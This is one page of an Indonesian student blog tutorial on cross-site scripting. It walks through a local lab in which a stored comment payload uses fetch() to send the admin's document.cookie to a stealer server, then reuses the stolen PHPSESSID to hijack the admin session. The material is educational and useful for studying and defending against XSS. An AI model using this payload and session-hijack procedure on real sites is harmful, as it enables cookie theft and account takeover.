Mohon tunggu...
roby sunjaya
roby sunjaya Mohon Tunggu... Mahasiswa

Saya adalah mahasiswa Teknik Informatika

Selanjutnya

Tutup

Pendidikan

Mengungkap Bahaya Cross-Site Scripting(XSS):Eksperimen dan Cara Mencegahnya

26 April 2025   17:38 Diperbarui: 2 Mei 2025   13:07 109
+
Laporkan Konten
Laporkan Akun
Kompasiana adalah platform blog. Konten ini menjadi tanggung jawab bloger dan tidak mewakili pandangan redaksi Kompas.
Lihat foto
Pendidikan. Sumber ilustrasi: PEXELS/McElspeth

<script>
fetch("http://localhost:1337/steal?c=" + document.cookie)
</script>

Submit komentar sebagai attacker.

c. Akses view_comments.php 

Admin membuka halaman komentar → skrip dijalankan → cookie dikirim ke stealer.js. 

Lihat Cookie Dicuri

Cek isi file stolen_cookies.txt(otomatis terbuat) di folder stealer_server/:

Stolen cookie: PHPSESSID=abc123456xyz

Gunakan Cookie untuk Bajak Sesi

  • Buka browser baru/incognito.

  • Masuk ke login.php

  • Tekan F12 → buka tab Application → pilih Cookies → edit:

Nama: PHPSESSID

Nilai: (isi dari stolen cookie)

Jika sesi PHPSESSID valid, kamu akan melihat halaman dashboard admin! 

HALAMAN :
  1. 1
  2. 2
  3. 3
  4. 4
  5. 5
  6. 6
  7. 7
  8. 8
Mohon tunggu...

Lihat Konten Pendidikan Selengkapnya
Lihat Pendidikan Selengkapnya
Beri Komentar
Berkomentarlah secara bijaksana dan bertanggung jawab. Komentar sepenuhnya menjadi tanggung jawab komentator seperti diatur dalam UU ITE

Belum ada komentar. Jadilah yang pertama untuk memberikan komentar!
LAPORKAN KONTEN
Alasan
Laporkan Konten
Laporkan Akun